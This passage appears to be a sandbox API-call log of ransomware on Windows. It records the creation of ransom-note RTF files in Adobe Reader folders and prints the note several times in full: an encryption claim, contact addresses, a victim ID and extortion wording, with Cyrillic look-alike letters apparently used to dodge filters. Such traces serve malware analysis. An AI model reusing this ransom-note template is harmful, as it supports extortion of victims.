rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0065.480] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0065.481] CloseHandle (hObject=0x1dc) returned 1 [0065.481] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\deu\\bg85_info.rtf")) returned 0xffffffff [0065.481] GetLastError () returned 0x2 [0065.481] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DEU\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\deu\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0065.482] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.482] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r 